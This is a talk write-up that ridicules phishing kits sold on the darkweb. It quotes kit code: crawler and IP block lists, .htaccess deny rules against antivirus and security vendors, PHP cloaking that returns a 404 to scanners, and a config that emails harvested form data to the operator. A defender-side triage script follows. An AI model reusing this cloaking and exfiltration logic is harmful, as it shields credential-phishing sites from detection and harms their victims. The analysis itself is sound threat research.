
Phishing kits k for kiddies

 

Write-up / transcript of a talk given at https://www.rump.beer/2019/

 

These days you can find anything on the darkweb. Some finds are hilarious and genuinely make us laugh. For example, turnkey phishing campaigns for script kiddies. These campaigns are sold, and are in fact old scripts dating back to the 90s! It does you good to have a laugh sometimes:

 


 

Phishing kit? "Hameçonnage"? "Hameçonnage en kit"? "Trousse d'hameçonnage"?

I looked for a definition from ANSSI but didn't find one. Big concept, so I'll use my own words.

 

Phishing Kits
✘ A .zip with everything you need inside
✘ Just change one variable and poof, your campaign is running.


Shadow Z118 PayPal scam, which was pretty slick all the same

Excerpt:

'TweetedTimes Bot',
'QuerySeekerSpider',
'ShowyouBot',
'woriobot',
'merlinkbot',
'BazQuxBot',
'Kraken',
'SISTRIX Crawler',
'R6_CommentReader',
'magpie-crawler',
'GrapeshotCrawler',
'PercolateCrawler',
'MaxPointCrawler',
'R6_FeedFetcher',
'NetSeer crawler',
'grokkit-crawler',
'SMXCrawler',
'PulseCrawler',
'Y!J-BRW',
'80legs.com/webcrawler',

Deny rules targeting specific IPs + domains

$bannedIP = array("^81.161.59.*", "^66.135.200.*", "^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*", "^91.103.66.*", "^208.91.115.*", "^199.30.228.*");

Deny rules (.htaccess) covering all the known AVs

deny from paypal.com
deny from 112.2o7.com
deny from firefox.com
deny from apple.com
deny from zeustracker.abuse.ch
deny from virustotal.com
deny from adminus.net
deny from aegislab.com
deny from alienvault.com
deny from antiy.net
deny from avast.com
deny from team-cymru.org
deny from eset.com
deny from fireeye.com
deny from microsoft.com
deny from kernelmode.info
deny from malwaredomainlist.com

Evasion: block by user agent

if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
    header('HTTP/1.0 404 Not Found');
    exit();
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'google')
   or strpos($_SERVER['HTTP_USER_AGENT'], 'msnbot')
   or strpos($_SERVER['HTTP_USER_AGENT'], 'Yahoo! Slurp')
   or strpos($_SERVER['HTTP_USER_AGENT'], 'YahooSeeker')
   or strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot')
   or strpos($_SERVER['HTTP_USER_AGENT'], 'bingbot')
   or strpos($_SERVER['HTTP_USER_AGENT'], 'crawler')
   or strpos($_SERVER['HTTP_USER_AGENT'], 'PycURL')
   or strpos($_SERVER['HTTP_USER_AGENT'], 'facebookexternalhit') !== false) {
    header('HTTP/1.0 404 Not Found');
    exit;
}

Fun facts, because hey, you've got to have a laugh sometimes

The tutorial for dummies

/*
****** Set your email below and configure functions to your requirements ****
****** FUNCTION CONTROL: 1=ON and 0=OFF ****
EXAMPLE
$Example=1; // Function On
$Example=0; // Function Off
*/
$Your_Email = "[email address removed by the page's spam-protection script]"; // Set your email
$Send_Log=1; // Email results
$Save_Log=0; // Saves results to server (./assets/logs/)
$Abuse_Filter=0; // Block abusive text
$One_Time_Access=0; // One Time Access: This blocks the users ip after the form has been submitted i.e. prevents users sending multiple fake forms
$Encrypt=0; // Encrypt: This will send/save your results with aes to decrypt use the key below
$Key = "582ACCD12E3D1337"; // This key is used to decrypt results and can be changed
$Send_Per_Page=1; // Send each pages data separate
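As an added defender-side example (not code from the talk or from any kit), here is a Python triage script that pulls the indicators discussed above out of a kit's source: the $bannedIP array and user-agent strpos() checks from the evasion section, the .htaccess deny lines, and the $Your_Email exfiltration address and feature flags from the config block. The PHP and .htaccess samples are constructed for the example; the function names are mine.

```python
import re

# Constructed sample of a kit's PHP file mirroring the patterns quoted above
# (banned-IP array, user-agent strpos() checks, $Your_Email config). Not real kit code.
SAMPLE_PHP = r'''<?php
$bannedIP = array("^66.249.*.*", "^74.125.*.*", "68.65.53.71");
if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) { header('HTTP/1.0 404 Not Found'); exit(); }
if(strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') or strpos($_SERVER['HTTP_USER_AGENT'], 'crawler') !== false) { exit; }
$Your_Email = "dropbox@example.invalid"; // Set your email
$Send_Log=1;
$Encrypt=0;
'''
# Constructed sample .htaccess, same "deny from" shape as the kit's.
SAMPLE_HTACCESS = "deny from virustotal.com\ndeny from 112.2o7.com\nAllow from all\n"


def triage_php(src):
    """Extract evasion and exfiltration indicators from one PHP file of a kit."""
    out = {"banned_ip_patterns": [], "blocked_user_agents": [], "exfil_email": None, "flags": {}}
    m = re.search(r'\$bannedIP\s*=\s*array\((.*?)\);', src, re.S)
    if m:  # every quoted entry of the array, regex-looking or not
        out["banned_ip_patterns"] = re.findall(r'"([^"]+)"', m.group(1))
    # each needle passed to strpos($_SERVER['HTTP_USER_AGENT'], '...')
    out["blocked_user_agents"] = re.findall(
        r"strpos\(\$_SERVER\['HTTP_USER_AGENT'\],\s*'([^']+)'\)", src)
    m = re.search(r'\$Your_Email\s*=\s*"([^"]*)"', src)
    if m:  # where stolen credentials get mailed: the most useful IoC for takedown
        out["exfil_email"] = m.group(1)
    for name, val in re.findall(r'\$(Send_Log|Save_Log|Encrypt|One_Time_Access)\s*=\s*(\d)', src):
        out["flags"][name] = val == "1"
    return out


def triage_htaccess(src):
    """Return the hosts/IPs a kit's .htaccess refuses to serve ('deny from' lines)."""
    return re.findall(r'^\s*deny\s+from\s+(\S+)', src, re.M | re.I)


def kit_is_suspicious(php, htaccess):
    """Heuristic: an exfil email plus any crawler/AV blocking is a strong kit signal."""
    p = triage_php(php)
    blocks_scanners = bool(p["banned_ip_patterns"] or p["blocked_user_agents"]
                           or triage_htaccess(htaccess))
    return p["exfil_email"] is not None and blocks_scanners


if __name__ == "__main__":
    print(triage_php(SAMPLE_PHP), triage_htaccess(SAMPLE_HTACCESS))
    print("suspicious:", kit_is_suspicious(SAMPLE_PHP, SAMPLE_HTACCESS))
```

Two observations on the kit code quoted above that matter when you scan such a page: in_array() compares REMOTE_ADDR literally, so the regex-looking entries such as "^66.249.*.*" never match and only bare addresses like 68.65.53.71 are actually blocked; and since only the last strpos() carries the !== false and the checks are case-sensitive, a needle found at offset 0 returns 0 and is not blocked either.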

 

The guy who's proud of his work and signs it with his Facebook page

1-Change email in Docu/os.php
                  Docu/mobile.php
                  Docu/

2- Upload to a good Cpanel or Shell.
3- I sell all Spamming & Hacking tools. To get more tools, add me on
skype blackshop tools
ICQ 657940639
[email address removed by the page's spam-protection script]

 

That's it, I hope you enjoyed it. Your comments/remarks are welcome.